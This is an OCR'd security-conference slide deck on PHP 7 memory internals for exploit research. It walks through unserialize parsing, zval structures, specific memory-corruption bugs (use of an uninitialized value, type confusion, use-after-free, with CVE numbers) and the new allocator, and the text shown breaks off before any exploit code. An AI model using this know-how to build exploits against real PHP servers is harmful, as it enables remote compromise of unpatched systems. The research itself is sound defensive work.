![Page 1: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/1.jpg)
©2016 Check Point Software Technologies Ltd.
PHP7 Memory Internals for Security Researchers
Yannay Livneh | Security Researcher
TEACHING THE NEW DOG OLD TRICKS
![Page 2: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/2.jpg)
About Me
• Yannay Livneh • Security Researcher @ CheckPoint • Play w/ – Networks – Embedded – Linux – Memory Corruptions – and stuff
.
![Page 3: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/3.jpg)
AGENDA
• Introduction • PHP Unserialize • ZVAL System • Unserialize + ZVAL => Bugs • Allocator • Bugs + Allocator => Exploit • Q.E.D.
.
![Page 4: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/4.jpg)
INTRO (THIS WORLD WE LIVE IN)
![Page 5: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/5.jpg)
PHP – its interesting
• Widely used • Servers rule the world • PHP-7 - future
.
![Page 6: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/6.jpg)
PHP Security
• Vulns vulns vulns • SQL Injection • XSS • Memory corruption? – Native functions – User input
• UNSERIALIZE
.
![Page 7: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/7.jpg)
Unserialize History of Insecurity
• More CVEs than I can count • Object Injection (PoP) • Memory Corruptions • Generic Exploitation (@i0n1c)
.
![Page 8: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/8.jpg)
Examples in the wild
.
![Page 9: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/9.jpg)
PHP-7
• Released in December 2015 • New values (zval) system • New Memory Allocation • => previous exploitation irrelevant
.
![Page 10: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/10.jpg)
Unserialize Nowadays – PHP-7
• Some CVEs • Object Injection (PoP) • Memory Corruptions • No Remote Exploits
.
![Page 11: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/11.jpg)
UNSERIALIZE (WHAT WE EXPLOIT)
![Page 12: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/12.jpg)
Unserialize
![Page 13: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/13.jpg)
Serialize/Unserialize
![Page 14: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/14.jpg)
Serialization$val = array(
NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 15: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/15.jpg)
Serialization
a:4:{ }
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 16: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/16.jpg)
Serialization
a:4:{i:0;N; }
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 17: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/17.jpg)
Serialization
a:4:{i:0;N;i:1;i:1337; }
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 18: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/18.jpg)
Serialization
a:4:{i:0;N;i:1;i:1337;i:2;s:5:”apple”; }
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 19: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/19.jpg)
Serialization
a:4:{i:0;N;i:1;i:1337;i:2;s:5:”apple”;i:3;a:3:{ }}
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 20: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/20.jpg)
Serialization
a:4:{i:0;N;i:1;i:1337;i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; }}
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 21: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/21.jpg)
Serialization
a:4:{i:0;N;i:1;i:1337;i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1;i:0;O:8:”stdClass”:0:{} }}
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
![Page 22: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/22.jpg)
Serialization
a:4:{i:0;N;i:1;i:1337;i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1;i:0;O:8:”stdClass”:0:{}i:1;i:7331;}}
$val = array(NULL,1337,‘apple’,array(
‘a’ => 1,new stdClass(),7331
));serialize($val);
.
![Page 23: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/23.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
![Page 24: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/24.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1 array
![Page 25: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/25.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2array
0 NULL
![Page 26: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/26.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2
3
array
0 NULL
1 1337
![Page 27: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/27.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2
3
4
array
0 NULL
1 1337
2 ‘apple’
![Page 28: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/28.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2
3
4
5
array
0 NULL
1 1337
2 ‘apple’
3array
![Page 29: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/29.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2
3
4
5
6
array
0 NULL
1 1337
2 ‘apple’
3array
‘a’ 1
![Page 30: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/30.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2
3
4
5
6
7
array
0 NULL
1 1337
2 ‘apple’
3array
‘a’ 1
0 stdClass()
![Page 31: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/31.jpg)
Unserializationunserialize(‘a:4:{i:0;N;i:1;i:1337; i:2;s:5:”apple”;i:3;a:3:{s:1:”a”;i:1; i:0;O:8:”stdClass”:0:{}i:1;R:3;}}’);
var_hash
1
2
3
4
5
6
7
array
0 NULL
1 1337
2 ‘apple’
3array
‘a’ 1
0 stdClass()
1
.
![Page 32: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/32.jpg)
Unserialize Take Away
• Complicated format • User control allocation • Global references • Re-use values
.
![Page 33: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/33.jpg)
ZVALS (HOW VALUES ARE STORED)
![Page 34: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/34.jpg)
Zvals
• Holds PHP variables • $x = 1; • Features: – Garbage collection – References: $y = &$x;
.
![Page 35: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/35.jpg)
Old (PHP-5) Zvals
• Zval is a pointer • Zval creation => allocate struct • GC – refcount + cycle detection • Reference – point same struct
.
![Page 36: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/36.jpg)
New Zvals motivation
• Less derefs • Less allocations • Designed for embedding – In structs – In arrays – On the stack
.
![Page 37: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/37.jpg)
New Zvals
• Only value & type • zend_value: union – primitive value – pointer to struct
![Page 38: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/38.jpg)
Example: int
$x = 1337;zval struct
value 1337
type IS_LONG
.
![Page 39: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/39.jpg)
New Zvals - refcount
• Refcount depends on type – Not refcounted: primitives – Refcounted: complex types
![Page 40: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/40.jpg)
Example: string
![Page 41: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/41.jpg)
Example: string
$x = “apple”;zval struct
value
type IS_STRING
_zend_string
refcount
hash
len
val[]
_zend_string
refcount 0
hash 0
len 5
val[] ‘a’
‘p’
‘p’
‘l’
‘e’
‘\0’
_zend_string
refcount 1
hash 0
len 5
val[] ‘a’
‘p’
‘p’
‘l’
‘e’
‘\0’
.
![Page 42: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/42.jpg)
New Zvals – references
• New type: reference$x = 1337;
zval struct ($x)
value 1337
type IS_LONG
![Page 43: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/43.jpg)
New Zvals – references
• New type: reference
zval struct ($x)
value 1337
type IS_LONG
_zend_reference
refcount 0
val zval struct
value 1337
type IS_LONG
$x = 1337; $y = &$x;
![Page 44: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/44.jpg)
New Zvals – references
• New type: reference$x = 1337; $y = &$x;
zval struct ($x)
value
type IS_REFERENCE
_zend_reference
refcount 1
val zval struct
value 1337
type IS_LONG
![Page 45: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/45.jpg)
New Zvals – references
• New type: reference$x = 1337; $y = &$x;
zval struct ($x)
value
type IS_REFERENCE
zval struct ($y)
value
type IS_REFERENCE
_zend_reference
refcount 2
val zval struct
value 1337
type IS_LONG
.
![Page 46: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/46.jpg)
ZVALS Take Away
• Designed for embedding • Less derefs • Less heap use • References - complicated
.
![Page 47: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/47.jpg)
BUGS (AKA vulns)
![Page 48: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/48.jpg)
Code Smell
• Global pointer to stack • SplObjectStorage::unserialize
• Not a bug
.
![Page 49: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/49.jpg)
Use Uninitialized Value
• SplObjectStorage::unserialize
• Which leads to
– rval = &inf
• Less common with pointers
.
CVE-2016-7480
![Page 50: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/50.jpg)
Type Confusion
• Making a Reference… • Change type • SplObjectStorage::unserialize
.
![Page 51: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/51.jpg)
Type Confusion
php_var_unserialize(&entry)
![Page 52: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/52.jpg)
Type Confusion
php_var_unserialize(&entry)
zval struct (entry)
value
type IS_OBJECT
_zend_object
….
![Page 53: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/53.jpg)
Type Confusion
php_var_unserialize(&entry) if (Z_TYPE(entry) != IS_OBJECT) { /* ERROR!!! */ }
zval struct (entry)
value
type IS_OBJECT
_zend_object
….
![Page 54: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/54.jpg)
Type Confusion
php_var_unserialize(&entry) if (Z_TYPE(entry) != IS_OBJECT) { /* ERROR!!! */ } php_var_unserialize(&inf)
zval struct (entry)
value
type IS_OBJECT
_zend_object
….
![Page 55: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/55.jpg)
Type Confusion
php_var_unserialize(&entry) if (Z_TYPE(entry) != IS_OBJECT) { /* ERROR!!! */ } php_var_unserialize(&inf)
zval struct (entry)
value
type IS_OBJECT_zend_reference
refcount 0
val zval struct
value
type IS_OBJECT
_zend_object
….
![Page 56: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/56.jpg)
Type Confusion
php_var_unserialize(&entry) if (Z_TYPE(entry) != IS_OBJECT) { /* ERROR!!! */ } php_var_unserialize(&inf)
zval struct (entry)
value
type IS_REFERENCE_zend_reference
refcount 1
val zval struct
value
type IS_OBJECT
_zend_object
….
![Page 57: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/57.jpg)
Type Confusion
php_var_unserialize(&entry) if (Z_TYPE(entry) != IS_OBJECT) { /* ERROR!!! */ } php_var_unserialize(&inf)
zval struct (entry)
value
type IS_REFERENCE_zend_reference
refcount 2
val zval struct
value
type IS_OBJECT
zval struct (inf)
value
type IS_REFERENCE
_zend_object
….
.
BUG #73258
![Page 58: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/58.jpg)
Use After Free
• Pointing to dynamic struct • var_unserializer.c:process_nested_data
• data points to ht • data stored in var_hash • when ht resized • ht reallocated
.
![Page 59: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/59.jpg)
Use After Freevar_hash
zval struct
value
type IS_OBJECT
_zend_object
…
properites
.
zval struct zval struct
value 0 value 1
type IS_LONG type IS_LONG
zval struct zval struct zval struct
value 0 value 1 value 2
type IS_LONG type IS_LONG type IS_LONG
![Page 60: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/60.jpg)
Use After Free
• Not very common • Unserialize ensure size ht • Yet… • __wakeup define property • DateInterval add properties
.
CVE-2016-7479
![Page 61: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/61.jpg)
Bugs Take Away
• More unserialize vulns • Different vulns • Use freed values
.
![Page 62: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/62.jpg)
ALLOC
(WHERE MEMORY COMES FROM)
![Page 63: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/63.jpg)
Old (PHP-5) Allocator
• Heap • Meta data per slot – Size – Flags
• Free List
.
![Page 64: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/64.jpg)
PHP-7 Allocator
• Complete Rewrite • Bins • Free Lists
.
![Page 65: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/65.jpg)
Allocator
• Allocate CHUNK from OS (2MB) • Divide to PAGES (4096B) • First page – descriptor – List of allocated and free pages – Pointers to BINS
• BIN – free list – By size – Multiple pages
.
![Page 66: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/66.jpg)
New CHUNKCHUNKchunk descriptorfree_slots
page_info
.
![Page 67: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/67.jpg)
New BINCHUNKchunk descriptorfree_slots
page_info16 …
.
